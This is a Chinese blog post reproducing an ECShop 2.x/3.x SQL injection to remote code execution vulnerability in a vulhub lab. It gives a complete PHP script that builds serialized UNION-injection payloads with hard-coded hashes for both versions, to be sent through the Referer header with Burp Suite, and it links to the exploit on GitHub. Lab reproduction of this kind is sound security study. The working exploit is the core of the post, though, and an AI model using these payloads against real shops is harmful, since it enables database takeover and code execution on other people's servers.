ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 漏洞复现

本文揭示了ECShop旧版本的SQL注入漏洞,详细介绍了利用过程,包括抓包、脚本生成和环境配置,以及修复前版本的POC示例。漏洞复现和参考资料对于安全人员理解和修复至关重要。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ECShop 2.x / 3.x SQL注入/远程执行代码漏洞

by ADummy

0x00利用路线

​ Burpsuite抓包—>脚本生成poc—>Burpsuite修改referer字段—>有回显

0x01漏洞介绍

​ ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0已修复此漏洞,vulhub使用其最新版本2.7.3和3.6.0非最新版本来重现该漏洞

0x02漏洞复现

有一个脚本可以为2.x和3.x生成POC:

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

启动环境后,访问http://your-ip:8080,您将看到2.7.3安装页面。访问http://your-ip:8081,您将看到3.6.0安装页面。都安装它们,mysql地址为mysql,mysql帐户和密码为root,数据库名称可以自由填写,但是2.7.3和3.6.0的数据库名称不能相同。
在这里插入图片描述
生成poc:
在这里插入图片描述
2.7:
在这里插入图片描述
3.x:
在这里插入图片描述

0x03参考资料

poc:https://github.com/ADummmy/vulhub_Writeup/blob/main/code/ecshop_sql_rce_exp.php

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值